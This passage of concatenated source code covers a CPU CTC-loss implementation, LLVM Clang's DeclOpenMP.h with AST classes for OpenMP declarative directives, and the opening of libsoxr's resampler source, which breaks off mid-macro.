bytes_used += sizeof(ProbT) * alphabet_size;
repeats = setup_labels(labels, blank_label, L, S);
}
template<typename ProbT>
int CpuCTC<ProbT>::CpuCTC_metadata::setup_labels(const int* const labels,
int blank_label, int L, int S) {
int e_counter = 0;
int s_counter = 0;
s_inc[s_counter++] = 1;
int repeats = 0;
for (int i = 1; i < L; ++i) {
if (labels[i-1] == labels[i]) {
s_inc[s_counter++] = 1;
s_inc[s_counter++] = 1;
e_inc[e_counter++] = 1;
e_inc[e_counter++] = 1;
++repeats;
}
else {
s_inc[s_counter++] = 2;
e_inc[e_counter++] = 2;
}
}
e_inc[e_counter++] = 1;
for (int i = 0; i < L; ++i) {
labels_w_blanks[2 * i] = blank_label;
labels_w_blanks[2 * i + 1] = labels[i];
}
labels_w_blanks[S - 1] = blank_label;
return repeats;
}
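// Worked example (illustrative): for labels {a, b, b} with blank '-',
// setup_labels produces labels_w_blanks = {-, a, -, b, -, b, -} (S = 2*L + 1
// = 7) and repeats = 1 for the repeated 'b'. The s_inc/e_inc tables record
// how far the active window of CTC states may advance per time step: 2 where
// a label change permits skipping the intervening blank, and two steps of 1
// where a repeat forces passing through it.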
template<typename ProbT>
std::tuple<ProbT, bool>
CpuCTC<ProbT>::cost_and_grad_kernel(ProbT *grad, const ProbT* const probs,
const int* const labels,
int T, int L, int mb, size_t bytes_used) {
const int S = 2*L + 1; // Number of labels with blanks
CpuCTC_metadata ctcm(L, S, T, mb, alphabet_size_, workspace_, bytes_used, blank_label_, labels);
bool over_threshold = false;
if (L + ctcm.repeats > T) {
return std::make_tuple(ProbT(0), over_threshold); // TODO, not right to return 0
}
ProbT llForward = compute_alphas(probs, ctcm.repeats, S, T, ctcm.e_inc,
ctcm.s_inc, ctcm.labels_w_blanks,
ctcm.alphas);
ProbT llBackward = compute_betas_and_grad(grad, probs, llForward, ctcm.repeats,
S, T, ctcm.e_inc, ctcm.s_inc,
ctcm.labels_w_blanks,
ctcm.alphas,
ctcm.betas,
ctcm.output);
ProbT diff = std::abs(llForward - llBackward);
if (diff > ctc_helper::threshold) {
over_threshold = true;
}
return std::make_tuple(-llForward, over_threshold);
}
// Computes forward probabilities
template<typename ProbT>
ProbT CpuCTC<ProbT>::compute_alphas(const ProbT* probs, int repeats, int S, int T,
const int* const e_inc,
const int* const s_inc,
const int* const labels,
ProbT* alphas) {
int start = (((S / 2) + repeats - T) < 0) ? 0 : 1,
end = S > 1 ? 2 : 1;
for (int i = start; i < end; ++i) {
alphas[i] = std::log(probs[labels[i]]);
}
for(int t = 1; t < T; ++t) {
int remain = (S / 2) + repeats - (T - t);
if(remain >= 0)
start += s_inc[remain];
if(t <= (S / 2) + repeats)
end += e_inc[t - 1];
int startloop = start;
int idx1 = t * S, idx2 = (t - 1) * S, idx3 = t * (alphabet_size_ * minibatch_);
if (start == 0) {
alphas[idx1] = alphas[idx2] + std::log(probs[blank_label_ + idx3]);
startloop += 1;
}
for(int i = startloop; i < end; ++i) {
ProbT prev_sum = ctc_helper::log_plus<ProbT>()(alphas[i + idx2], alphas[(i-1) + idx2]);
// Skip two if not on blank and not on repeat.
if (labels[i] != blank_label_ && i != 1 && labels[i] != labels[i-2])
prev_sum = ctc_helper::log_plus<ProbT>()(prev_sum, alphas[(i-2) + idx2]);
alphas[i + idx1] = prev_sum + std::log(probs[labels[i] + idx3]);
}
}
ProbT loglike = ctc_helper::neg_inf<ProbT>();
for(int i = start; i < end; ++i) {
loglike = ctc_helper::log_plus<ProbT>()(loglike, alphas[i + (T - 1) * S]);
}
return loglike;
}
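// The log_plus functor used above comes from ctc_helper.h (not shown here).
// A typical numerically stable log-space addition looks like this sketch
// (illustrative only; the actual helper may differ in detail):
//
// template<typename T>
// T log_plus_sketch(T a, T b) { // returns log(exp(a) + exp(b))
//   if (a == ctc_helper::neg_inf<T>()) return b;
//   if (b == ctc_helper::neg_inf<T>()) return a;
//   T m = std::max(a, b);
//   return m + std::log1p(std::exp(std::min(a, b) - m)); // avoids overflow
// }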
// Starting from T, we sweep backward over the alpha array computing one column
// of betas as we go. At each position we can update product alpha * beta and then
// sum into the gradient associated with each label.
// NOTE computes gradient w.r.t UNNORMALIZED final layer activations.
// Assumed passed in grads are already zeroed!
template<typename ProbT>
ProbT CpuCTC<ProbT>::compute_betas_and_grad(ProbT* grad, const ProbT* const probs,
ProbT log_partition, int repeats,
int S, int T, const int* const e_inc,
const int* const s_inc,
const int* const labels,
ProbT* alphas,
ProbT* betas,
ProbT* output) {
int start = S > 1 ? (S - 2) : 0,
end = (T > (S / 2) + repeats) ? S : S-1;
std::fill(output, output + alphabet_size_, ctc_helper::neg_inf<ProbT>());
//set the starting values in the beta column at the very right edge
for (int i = start; i < end; ++i) {
betas[i] = std::log(probs[labels[i] + (T - 1) * (alphabet_size_ * minibatch_)]);
//compute alpha * beta in log space at this position in (S, T) space
alphas[i + (T - 1) * S] += betas[i];
//update the gradient associated with this label
//essentially performing a reduce-by-key in a sequential manner
output[labels[i]] =
ctc_helper::log_plus<ProbT>()(alphas[i + (T - 1) * S], output[labels[i]]);
}
//update the gradient w.r.t. each unique label
for (int i = 0; i < alphabet_size_; ++i) {
int idx3 = (T - 1) * alphabet_size_ * minibatch_ + i;
if (output[i] == 0.0 || output[i] == ctc_helper::neg_inf<ProbT>() ||
probs[idx3] == 0.0) {
grad[idx3] = probs[idx3];
} else {
grad[idx3] = probs[idx3] - std::exp(output[i] -
std::log(probs[idx3]) - log_partition);
}
}
//loop from the second to last column all the way to the left
for(int t = T - 2; t >= 0; --t) {
int remain = (S / 2) + repeats - (T - t);
if(remain >= -1)
start -= s_inc[remain + 1];
if(t < (S / 2) + repeats)
end -= e_inc[t];
int endloop = end == S ? end - 1 : end;
int idx1 = t * S, idx3 = t * (alphabet_size_ * minibatch_);
std::fill(output, output + alphabet_size_, ctc_helper::neg_inf<ProbT>());
for(int i = start; i < endloop; ++i) {
ProbT next_sum = ctc_helper::log_plus<ProbT>()(betas[i], betas[(i+1)]);
// Skip two if not on blank and not on repeat.
if (labels[i] != blank_label_ && i != (S-2) && labels[i] != labels[i+2]){
next_sum = ctc_helper::log_plus<ProbT>()(next_sum, betas[(i+2)]);
}
betas[i] = next_sum + std::log(probs[labels[i] + idx3]);
//compute alpha * beta in log space
alphas[i + idx1] += betas[i];
//update the gradient associated with this label
output[labels[i]] =
ctc_helper::log_plus<ProbT>()(alphas[i + idx1], output[labels[i]]);
}
if (end == S) {
betas[(S-1)] = betas[(S-1)] + std::log(probs[blank_label_ + idx3]);
alphas[(S-1) + idx1] += betas[(S-1)];
output[labels[S-1]] =
ctc_helper::log_plus<ProbT>()(alphas[S-1 + idx1], output[labels[S-1]]);
}
//go over the unique labels and compute the final grad
//w.r.t. each one at this time step
for (int i = 0; i < alphabet_size_; ++i) {
if (output[i] == 0.0 || output[i] == ctc_helper::neg_inf<ProbT>() ||
probs[idx3] == 0.0) {
grad[idx3] = probs[idx3];
} else {
grad[idx3] = probs[idx3] - std::exp(output[i] -
std::log(probs[idx3]) - log_partition);
}
++idx3;
}
}
ProbT loglike = ctc_helper::neg_inf<ProbT>();
for(int i = start; i < end; ++i) {
loglike = ctc_helper::log_plus<ProbT>()(loglike, betas[i]);
}
return loglike;
}
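// In formulas: with Z = exp(log_partition) the full-sequence likelihood, the
// gradient branches above compute, per time step t and symbol c,
//   grad[c] = p_c(t) - (1 / (p_c(t) * Z)) * sum_{s : labels[s] == c} alpha_t(s) * beta_t(s)
// evaluated in log space via 'output' (which holds log of the alpha*beta sum
// per label). This is the standard CTC gradient w.r.t. the unnormalized
// final-layer activations.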
template<typename ProbT>
ctcStatus_t
CpuCTC<ProbT>::cost_and_grad(const ProbT* const probs,
ProbT *grads,
ProbT *costs,
const int* const flat_labels,
const int* const label_lengths,
const int* const input_lengths) {
if (probs == nullptr ||
grads == nullptr ||
costs == nullptr ||
flat_labels == nullptr ||
label_lengths == nullptr ||
input_lengths == nullptr
)
return CTC_STATUS_INVALID_VALUE;
//ProbT* probs = static_cast<ProbT *>(workspace_);
int maxT = *std::max_element(input_lengths, input_lengths + minibatch_);
size_t bytes_used = 0; //sizeof(ProbT) * minibatch_ * alphabet_size_ * maxT;
//per minibatch memory
size_t per_minibatch_bytes = 0;
int maxL = *std::max_element(label_lengths, label_lengths + minibatch_);
int maxS = 2 * maxL + 1;
//output
per_minibatch_bytes += sizeof(float) * alphabet_size_;
//alphas
per_minibatch_bytes += sizeof(float) * maxS * maxT;
//betas
per_minibatch_bytes += sizeof(float) * maxS;
//labels w/blanks, e_inc, s_inc
per_minibatch_bytes += 3 * sizeof(int) * maxS;
#pragma omp parallel for
for (int mb = 0; mb < minibatch_; ++mb) {
const int T = input_lengths[mb]; // Length of utterance (time)
const int L = label_lengths[mb]; // Number of labels in transcription
bool mb_status;
std::tie(costs[mb], mb_status) =
cost_and_grad_kernel(grads + mb * alphabet_size_,
probs + mb * alphabet_size_,
flat_labels + std::accumulate(label_lengths, label_lengths + mb, 0),
T, L, mb,
bytes_used + mb * per_minibatch_bytes);
}
return CTC_STATUS_SUCCESS;
}
template<typename ProbT>
ctcStatus_t CpuCTC<ProbT>::score_forward(const ProbT* const probs,
ProbT* costs,
const int* const flat_labels,
const int* const label_lengths,
const int* const input_lengths) {
if (probs == nullptr ||
costs == nullptr ||
flat_labels == nullptr ||
label_lengths == nullptr ||
input_lengths == nullptr
)
return CTC_STATUS_INVALID_VALUE;
//ProbT* probs = static_cast<ProbT *>(workspace_);
int maxT = *std::max_element(input_lengths, input_lengths + minibatch_);
size_t bytes_used = 0; //sizeof(ProbT) * minibatch_ * alphabet_size_ * maxT;
//per minibatch memory
size_t per_minibatch_bytes = 0;
int maxL = *std::max_element(label_lengths, label_lengths + minibatch_);
int maxS = 2 * maxL + 1;
//output
per_minibatch_bytes += sizeof(float) * alphabet_size_;
//alphas
per_minibatch_bytes += sizeof(float) * maxS * maxT;
//betas
per_minibatch_bytes += sizeof(float) * maxS;
//labels w/blanks, e_inc, s_inc
per_minibatch_bytes += 3 * sizeof(int) * maxS;
#pragma omp parallel for
for (int mb = 0; mb < minibatch_; ++mb) {
const int T = input_lengths[mb]; // Length of utterance (time)
const int L = label_lengths[mb]; // Number of labels in transcription
const int S = 2*L + 1; // Number of labels with blanks
CpuCTC_metadata ctcm(L, S, T, mb, alphabet_size_, workspace_,
bytes_used + mb * per_minibatch_bytes, blank_label_,
flat_labels + std::accumulate(label_lengths, label_lengths + mb, 0));
if (L + ctcm.repeats > T)
costs[mb] = ProbT(0);
else {
costs[mb] = -compute_alphas(probs + mb * alphabet_size_, ctcm.repeats, S, T,
ctcm.e_inc, ctcm.s_inc, ctcm.labels_w_blanks,
ctcm.alphas);
}
}
return CTC_STATUS_SUCCESS;
}
|
DeclOpenMP.h | //===- DeclOpenMP.h - Classes for representing OpenMP directives -*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
///
/// \file
/// This file defines OpenMP nodes for declarative directives.
///
//===----------------------------------------------------------------------===//
#ifndef LLVM_CLANG_AST_DECLOPENMP_H
#define LLVM_CLANG_AST_DECLOPENMP_H
#include "clang/AST/Decl.h"
#include "clang/AST/Expr.h"
#include "clang/AST/ExternalASTSource.h"
#include "clang/AST/OpenMPClause.h"
#include "clang/AST/Type.h"
#include "llvm/ADT/ArrayRef.h"
#include "llvm/Support/TrailingObjects.h"
namespace clang {
/// This represents the '#pragma omp threadprivate ...' directive.
/// For example, in the following, both 'a' and 'A::b' are threadprivate:
///
/// \code
/// int a;
/// #pragma omp threadprivate(a)
/// struct A {
/// static int b;
/// #pragma omp threadprivate(b)
/// };
/// \endcode
///
class OMPThreadPrivateDecl final
: public Decl,
private llvm::TrailingObjects<OMPThreadPrivateDecl, Expr *> {
friend class ASTDeclReader;
friend TrailingObjects;
unsigned NumVars;
virtual void anchor();
OMPThreadPrivateDecl(Kind DK, DeclContext *DC, SourceLocation L) :
Decl(DK, DC, L), NumVars(0) { }
ArrayRef<const Expr *> getVars() const {
return llvm::makeArrayRef(getTrailingObjects<Expr *>(), NumVars);
}
MutableArrayRef<Expr *> getVars() {
return MutableArrayRef<Expr *>(getTrailingObjects<Expr *>(), NumVars);
}
void setVars(ArrayRef<Expr *> VL);
public:
static OMPThreadPrivateDecl *Create(ASTContext &C, DeclContext *DC,
SourceLocation L,
ArrayRef<Expr *> VL);
static OMPThreadPrivateDecl *CreateDeserialized(ASTContext &C,
unsigned ID, unsigned N);
typedef MutableArrayRef<Expr *>::iterator varlist_iterator;
typedef ArrayRef<const Expr *>::iterator varlist_const_iterator;
typedef llvm::iterator_range<varlist_iterator> varlist_range;
typedef llvm::iterator_range<varlist_const_iterator> varlist_const_range;
unsigned varlist_size() const { return NumVars; }
bool varlist_empty() const { return NumVars == 0; }
varlist_range varlists() {
return varlist_range(varlist_begin(), varlist_end());
}
varlist_const_range varlists() const {
return varlist_const_range(varlist_begin(), varlist_end());
}
varlist_iterator varlist_begin() { return getVars().begin(); }
varlist_iterator varlist_end() { return getVars().end(); }
varlist_const_iterator varlist_begin() const { return getVars().begin(); }
varlist_const_iterator varlist_end() const { return getVars().end(); }
static bool classof(const Decl *D) { return classofKind(D->getKind()); }
static bool classofKind(Kind K) { return K == OMPThreadPrivate; }
};
/// This represents the '#pragma omp declare reduction ...' directive.
/// For example, the following declares a reduction 'foo' for the types 'int'
/// and 'float':
///
/// \code
/// #pragma omp declare reduction (foo : int,float : omp_out += omp_in) \
/// initializer (omp_priv = 0)
/// \endcode
///
/// Here 'omp_out += omp_in' is a combiner and 'omp_priv = 0' is an initializer.
class OMPDeclareReductionDecl final : public ValueDecl, public DeclContext {
// This class stores some data in DeclContext::OMPDeclareReductionDeclBits
// to save some space. Use the provided accessors to access it.
public:
enum InitKind {
CallInit, // Initialized by function call.
DirectInit, // omp_priv(<expr>)
CopyInit // omp_priv = <expr>
};
private:
friend class ASTDeclReader;
/// Combiner for declare reduction construct.
Expr *Combiner = nullptr;
/// Initializer for declare reduction construct.
Expr *Initializer = nullptr;
/// In parameter of the combiner.
Expr *In = nullptr;
/// Out parameter of the combiner.
Expr *Out = nullptr;
/// Priv parameter of the initializer.
Expr *Priv = nullptr;
/// Orig parameter of the initializer.
Expr *Orig = nullptr;
/// Reference to the previous declare reduction construct in the same
/// scope with the same name. Required for proper templates instantiation if
/// the declare reduction construct is declared inside compound statement.
LazyDeclPtr PrevDeclInScope;
virtual void anchor();
OMPDeclareReductionDecl(Kind DK, DeclContext *DC, SourceLocation L,
DeclarationName Name, QualType Ty,
OMPDeclareReductionDecl *PrevDeclInScope);
void setPrevDeclInScope(OMPDeclareReductionDecl *Prev) {
PrevDeclInScope = Prev;
}
public:
/// Create declare reduction node.
static OMPDeclareReductionDecl *
Create(ASTContext &C, DeclContext *DC, SourceLocation L, DeclarationName Name,
QualType T, OMPDeclareReductionDecl *PrevDeclInScope);
/// Create deserialized declare reduction node.
static OMPDeclareReductionDecl *CreateDeserialized(ASTContext &C,
unsigned ID);
/// Get combiner expression of the declare reduction construct.
Expr *getCombiner() { return Combiner; }
const Expr *getCombiner() const { return Combiner; }
/// Get In variable of the combiner.
Expr *getCombinerIn() { return In; }
const Expr *getCombinerIn() const { return In; }
/// Get Out variable of the combiner.
Expr *getCombinerOut() { return Out; }
const Expr *getCombinerOut() const { return Out; }
/// Set combiner expression for the declare reduction construct.
void setCombiner(Expr *E) { Combiner = E; }
/// Set combiner In and Out vars.
void setCombinerData(Expr *InE, Expr *OutE) {
In = InE;
Out = OutE;
}
/// Get initializer expression (if specified) of the declare reduction
/// construct.
Expr *getInitializer() { return Initializer; }
const Expr *getInitializer() const { return Initializer; }
/// Get initializer kind.
InitKind getInitializerKind() const {
return static_cast<InitKind>(OMPDeclareReductionDeclBits.InitializerKind);
}
/// Get Orig variable of the initializer.
Expr *getInitOrig() { return Orig; }
const Expr *getInitOrig() const { return Orig; }
/// Get Priv variable of the initializer.
Expr *getInitPriv() { return Priv; }
const Expr *getInitPriv() const { return Priv; }
/// Set initializer expression for the declare reduction construct.
void setInitializer(Expr *E, InitKind IK) {
Initializer = E;
OMPDeclareReductionDeclBits.InitializerKind = IK;
}
/// Set initializer Orig and Priv vars.
void setInitializerData(Expr *OrigE, Expr *PrivE) {
Orig = OrigE;
Priv = PrivE;
}
/// Get reference to previous declare reduction construct in the same
/// scope with the same name.
OMPDeclareReductionDecl *getPrevDeclInScope();
const OMPDeclareReductionDecl *getPrevDeclInScope() const;
static bool classof(const Decl *D) { return classofKind(D->getKind()); }
static bool classofKind(Kind K) { return K == OMPDeclareReduction; }
static DeclContext *castToDeclContext(const OMPDeclareReductionDecl *D) {
return static_cast<DeclContext *>(const_cast<OMPDeclareReductionDecl *>(D));
}
static OMPDeclareReductionDecl *castFromDeclContext(const DeclContext *DC) {
return static_cast<OMPDeclareReductionDecl *>(
const_cast<DeclContext *>(DC));
}
};
/// This represents the '#pragma omp declare mapper ...' directive. Map clauses
/// are allowed on this directive. The following example declares a
/// user-defined mapper for the type 'struct vec', instructing that the fields
/// 'len' and 'data' be mapped when mapping instances of 'struct vec'.
///
/// \code
/// #pragma omp declare mapper(mid: struct vec v) map(v.len, v.data[0:N])
/// \endcode
class OMPDeclareMapperDecl final : public ValueDecl, public DeclContext {
friend class ASTDeclReader;
/// Clauses associated with this mapper declaration
MutableArrayRef<OMPClause *> Clauses;
/// Mapper variable, which is 'v' in the example above
Expr *MapperVarRef = nullptr;
/// Name of the mapper variable
DeclarationName VarName;
LazyDeclPtr PrevDeclInScope;
virtual void anchor();
OMPDeclareMapperDecl(Kind DK, DeclContext *DC, SourceLocation L,
DeclarationName Name, QualType Ty,
DeclarationName VarName,
OMPDeclareMapperDecl *PrevDeclInScope)
: ValueDecl(DK, DC, L, Name, Ty), DeclContext(DK), VarName(VarName),
PrevDeclInScope(PrevDeclInScope) {}
void setPrevDeclInScope(OMPDeclareMapperDecl *Prev) {
PrevDeclInScope = Prev;
}
/// Sets an array of clauses to this mapper declaration
void setClauses(ArrayRef<OMPClause *> CL);
public:
/// Creates declare mapper node.
static OMPDeclareMapperDecl *Create(ASTContext &C, DeclContext *DC,
SourceLocation L, DeclarationName Name,
QualType T, DeclarationName VarName,
OMPDeclareMapperDecl *PrevDeclInScope);
/// Creates deserialized declare mapper node.
static OMPDeclareMapperDecl *CreateDeserialized(ASTContext &C, unsigned ID,
unsigned N);
/// Creates an array of clauses for this mapper declaration and initializes
/// them.
void CreateClauses(ASTContext &C, ArrayRef<OMPClause *> CL);
using clauselist_iterator = MutableArrayRef<OMPClause *>::iterator;
using clauselist_const_iterator = ArrayRef<const OMPClause *>::iterator;
using clauselist_range = llvm::iterator_range<clauselist_iterator>;
using clauselist_const_range =
llvm::iterator_range<clauselist_const_iterator>;
unsigned clauselist_size() const { return Clauses.size(); }
bool clauselist_empty() const { return Clauses.empty(); }
clauselist_range clauselists() {
return clauselist_range(clauselist_begin(), clauselist_end());
}
clauselist_const_range clauselists() const {
return clauselist_const_range(clauselist_begin(), clauselist_end());
}
clauselist_iterator clauselist_begin() { return Clauses.begin(); }
clauselist_iterator clauselist_end() { return Clauses.end(); }
clauselist_const_iterator clauselist_begin() const { return Clauses.begin(); }
clauselist_const_iterator clauselist_end() const { return Clauses.end(); }
/// Get the variable declared in the mapper
Expr *getMapperVarRef() { return MapperVarRef; }
const Expr *getMapperVarRef() const { return MapperVarRef; }
/// Set the variable declared in the mapper
void setMapperVarRef(Expr *MapperVarRefE) { MapperVarRef = MapperVarRefE; }
/// Get the name of the variable declared in the mapper
DeclarationName getVarName() { return VarName; }
/// Get reference to previous declare mapper construct in the same
/// scope with the same name.
OMPDeclareMapperDecl *getPrevDeclInScope();
const OMPDeclareMapperDecl *getPrevDeclInScope() const;
static bool classof(const Decl *D) { return classofKind(D->getKind()); }
static bool classofKind(Kind K) { return K == OMPDeclareMapper; }
static DeclContext *castToDeclContext(const OMPDeclareMapperDecl *D) {
return static_cast<DeclContext *>(const_cast<OMPDeclareMapperDecl *>(D));
}
static OMPDeclareMapperDecl *castFromDeclContext(const DeclContext *DC) {
return static_cast<OMPDeclareMapperDecl *>(const_cast<DeclContext *>(DC));
}
};
/// Pseudo declaration for capturing expressions. Also used for capturing
/// non-static data members in non-static member functions.
///
/// Clang supports capturing of variables only, but OpenMP 4.5 allows
/// privatizing non-static members of the current class in non-static member
/// functions. This pseudo-declaration allows such captures to be handled
/// properly by wrapping the captured expression in a variable-like
/// declaration.
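///
/// For example (illustrative), in
///
/// \code
/// struct S {
///   int a;
///   void foo() {
/// #pragma omp parallel for firstprivate(a)
///     for (int i = 0; i < 10; ++i)
///       a += i; // refers to the private copy of the captured member
///   }
/// };
/// \endcode
///
/// the implicit use of 'this->a' in the clause is wrapped in an
/// OMPCapturedExprDecl so that it can be privatized like an ordinary
/// variable.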
class OMPCapturedExprDecl final : public VarDecl {
friend class ASTDeclReader;
void anchor() override;
OMPCapturedExprDecl(ASTContext &C, DeclContext *DC, IdentifierInfo *Id,
QualType Type, TypeSourceInfo *TInfo,
SourceLocation StartLoc)
: VarDecl(OMPCapturedExpr, C, DC, StartLoc, StartLoc, Id, Type, TInfo,
SC_None) {
setImplicit();
}
public:
static OMPCapturedExprDecl *Create(ASTContext &C, DeclContext *DC,
IdentifierInfo *Id, QualType T,
SourceLocation StartLoc);
static OMPCapturedExprDecl *CreateDeserialized(ASTContext &C, unsigned ID);
SourceRange getSourceRange() const override LLVM_READONLY;
// Implement isa/cast/dyncast/etc.
static bool classof(const Decl *D) { return classofKind(D->getKind()); }
static bool classofKind(Kind K) { return K == OMPCapturedExpr; }
};
/// This represents the '#pragma omp requires ...' directive.
/// For example
///
/// \code
/// #pragma omp requires unified_address
/// \endcode
///
class OMPRequiresDecl final
: public Decl,
private llvm::TrailingObjects<OMPRequiresDecl, OMPClause *> {
friend class ASTDeclReader;
friend TrailingObjects;
// Number of clauses associated with this requires declaration
unsigned NumClauses = 0;
virtual void anchor();
OMPRequiresDecl(Kind DK, DeclContext *DC, SourceLocation L)
: Decl(DK, DC, L), NumClauses(0) {}
/// Returns an array of immutable clauses associated with this requires
/// declaration
ArrayRef<const OMPClause *> getClauses() const {
return llvm::makeArrayRef(getTrailingObjects<OMPClause *>(), NumClauses);
}
/// Returns an array of clauses associated with this requires declaration
MutableArrayRef<OMPClause *> getClauses() {
return MutableArrayRef<OMPClause *>(getTrailingObjects<OMPClause *>(),
NumClauses);
}
/// Sets an array of clauses to this requires declaration
void setClauses(ArrayRef<OMPClause *> CL);
public:
/// Create requires node.
static OMPRequiresDecl *Create(ASTContext &C, DeclContext *DC,
SourceLocation L, ArrayRef<OMPClause *> CL);
/// Create deserialized requires node.
static OMPRequiresDecl *CreateDeserialized(ASTContext &C, unsigned ID,
unsigned N);
using clauselist_iterator = MutableArrayRef<OMPClause *>::iterator;
using clauselist_const_iterator = ArrayRef<const OMPClause *>::iterator;
using clauselist_range = llvm::iterator_range<clauselist_iterator>;
using clauselist_const_range = llvm::iterator_range<clauselist_const_iterator>;
unsigned clauselist_size() const { return NumClauses; }
bool clauselist_empty() const { return NumClauses == 0; }
clauselist_range clauselists() {
return clauselist_range(clauselist_begin(), clauselist_end());
}
clauselist_const_range clauselists() const {
return clauselist_const_range(clauselist_begin(), clauselist_end());
}
clauselist_iterator clauselist_begin() { return getClauses().begin(); }
clauselist_iterator clauselist_end() { return getClauses().end(); }
clauselist_const_iterator clauselist_begin() const {
return getClauses().begin();
}
clauselist_const_iterator clauselist_end() const {
return getClauses().end();
}
static bool classof(const Decl *D) { return classofKind(D->getKind()); }
static bool classofKind(Kind K) { return K == OMPRequires; }
};
} // end namespace clang
#endif
|
soxr.c | /* SoX Resampler Library Copyright (c) 2007-18 robs@users.sourceforge.net
* Licence for this file: LGPL v2.1 See LICENCE for details. */
#include <math.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include "soxr.h"
#include "data-io.h"
#include "internal.h"
#if AVUTIL_FOUND
#include <libavutil/cpu.h>
#endif
#if WITH_DEV_TRACE
#include <stdarg.h>
#include <stdio.h>
int _soxr_trace_level;
void _soxr_trace(char const * fmt, ...)
{
va_list args;
va_start(args, fmt);
vfprintf(stderr, fmt, args);
fputc('\n', stderr);
va_end(args);
}
#endif
char const * soxr_version(void)
{
return "libsoxr-" SOXR_THIS_VERSION_STR;
}
typedef void sample_t; /* float or double */
typedef void (* fn_t)(void);
typedef fn_t control_block_t[10];
#define resampler_input (*(sample_t * (*)(void *, sample_t * samples, size_t n))p->control_block[0])
#define resampler_process (*(void (*)(void *, size_t))p->control_block[1])
#define resampler_output (*(sample_t const * (*)(void *, sample_t * samples, size_t * n))p->control_block[2])
#define resampler_flush (*(void (*)(void *))p->control_block[3])
#define resampler_close (*(void (*)(void *))p->control_block[4])
#define resampler_delay (*(double (*)(void *))p->control_block[5])
#define resampler_sizes (*(void (*)(size_t * shared, size_t * channel))p->control_block[6])
#define resampler_create (*(char const * (*)(void * channel, void * shared, double io_ratio, soxr_quality_spec_t * q_spec, soxr_runtime_spec_t * r_spec, double scale))p->control_block[7])
#define resampler_set_io_ratio (*(void (*)(void *, double io_ratio, size_t len))p->control_block[8])
#define resampler_id (*(char const * (*)(void))p->control_block[9])
typedef void * resampler_t; /* For one channel. */
typedef void * resampler_shared_t; /* Between channels. */
typedef void (* deinterleave_t)(sample_t * * dest,
soxr_datatype_t data_type, void const * * src0, size_t n, unsigned ch);
typedef size_t (* interleave_t)(soxr_datatype_t data_type, void * * dest,
sample_t const * const * src, size_t, unsigned, unsigned long *);
struct soxr {
unsigned num_channels;
double io_ratio;
soxr_error_t error;
soxr_quality_spec_t q_spec;
soxr_io_spec_t io_spec;
soxr_runtime_spec_t runtime_spec;
void * input_fn_state;
soxr_input_fn_t input_fn;
size_t max_ilen;
resampler_shared_t shared;
resampler_t * resamplers;
control_block_t control_block;
deinterleave_t deinterleave;
interleave_t interleave;
void * * channel_ptrs;
size_t clips;
unsigned long seed;
int flushing;
};
#if WITH_CR32 || WITH_CR32S || WITH_CR64 || WITH_CR64S
#include "filter.h"
#else
#define lsx_to_3dB(x) ((x)/(x))
#endif
soxr_quality_spec_t soxr_quality_spec(unsigned long recipe, unsigned long flags)
{
soxr_quality_spec_t spec, * p = &spec;
unsigned q = recipe & 0xf; /* TODO: move to soxr-lsr.c: */
unsigned quality = q > SOXR_LSR2Q+2? SOXR_VHQ : q > SOXR_LSR2Q? SOXR_QQ : q;
double rej;
memset(p, 0, sizeof(*p));
if (quality > SOXR_PRECISIONQ) {
p->e = "invalid quality type";
return spec;
}
flags |= quality < SOXR_LSR0Q ? RESET_ON_CLEAR : 0;
p->phase_response = "\62\31\144"[(recipe & 0x30)>>4];
p->stopband_begin = 1;
p->precision =
quality == SOXR_QQ ? 0 :
quality <= SOXR_16_BITQ ? 16 :
quality <= SOXR_32_BITQ ? 4 + quality * 4 :
quality <= SOXR_LSR2Q ? 55 - quality * 4 : /* TODO: move to soxr-lsr.c */
0;
rej = p->precision * linear_to_dB(2.);
p->flags = flags;
if (quality <= SOXR_32_BITQ || quality == SOXR_PRECISIONQ) {
#define LOW_Q_BW0 (1385 / 2048.) /* 0.67625 rounded to be exactly representable in FP. */
p->passband_end = quality == 1? LOW_Q_BW0 : 1 - .05 / lsx_to_3dB(rej);
if (quality <= 2)
p->flags &= ~SOXR_ROLLOFF_NONE, p->flags |= SOXR_ROLLOFF_MEDIUM;
}
else { /* TODO: move to soxr-lsr.c */
static float const bw[] = {.931f, .832f, .663f};
p->passband_end = bw[quality - SOXR_LSR0Q];
if (quality == SOXR_LSR2Q) {
p->flags &= ~SOXR_ROLLOFF_NONE;
p->flags |= SOXR_ROLLOFF_LSR2Q | SOXR_PROMOTE_TO_LQ;
}
}
if (recipe & SOXR_STEEP_FILTER)
p->passband_end = 1 - .01 / lsx_to_3dB(rej);
return spec;
}
char const * soxr_engine(soxr_t p)
{
return resampler_id();
}
size_t * soxr_num_clips(soxr_t p)
{
return &p->clips;
}
soxr_error_t soxr_error(soxr_t p)
{
return p->error;
}
soxr_runtime_spec_t soxr_runtime_spec(unsigned num_threads)
{
soxr_runtime_spec_t spec, * p = &spec;
memset(p, 0, sizeof(*p));
p->log2_min_dft_size = 10;
p->log2_large_dft_size = 17;
p->coef_size_kbytes = 400;
p->num_threads = num_threads;
return spec;
}
soxr_io_spec_t soxr_io_spec(
soxr_datatype_t itype,
soxr_datatype_t otype)
{
soxr_io_spec_t spec, * p = &spec;
memset(p, 0, sizeof(*p));
if ((itype | otype) >= SOXR_SPLIT * 2)
p->e = "invalid io datatype(s)";
else {
p->itype = itype;
p->otype = otype;
p->scale = 1;
}
return spec;
}
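/* A minimal usage sketch of the public API configured by the spec
 * constructors above (illustrative; soxr.h documents the authoritative
 * signatures). soxr_oneshot() resamples a whole buffer in one call:
 *
 *   float in[48000], out[44100]; size_t odone;
 *   soxr_io_spec_t io = soxr_io_spec(SOXR_FLOAT32_I, SOXR_FLOAT32_I);
 *   soxr_error_t e = soxr_oneshot(48000, 44100, 1,
 *       in, 48000, NULL, out, 44100, &odone, &io, NULL, NULL);
 */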
#if (WITH_CR32S && WITH_CR32) || (WITH_CR64S && WITH_CR64)
#if defined __GNUC__ && defined __x86_64__
#define CPUID(type, eax_, ebx_, ecx_, edx_) \
__asm__ __volatile__ ( \
"cpuid \n\t" \
: "=a" (eax_), "=b" (ebx_), "=c" (ecx_), "=d" (edx_) \
: "a" (type), "c" (0));
#elif defined __GNUC__ && defined __i386__
#define CPUID(type, eax_, ebx_, ecx_, edx_) \
__asm__ __volatile__ ( \
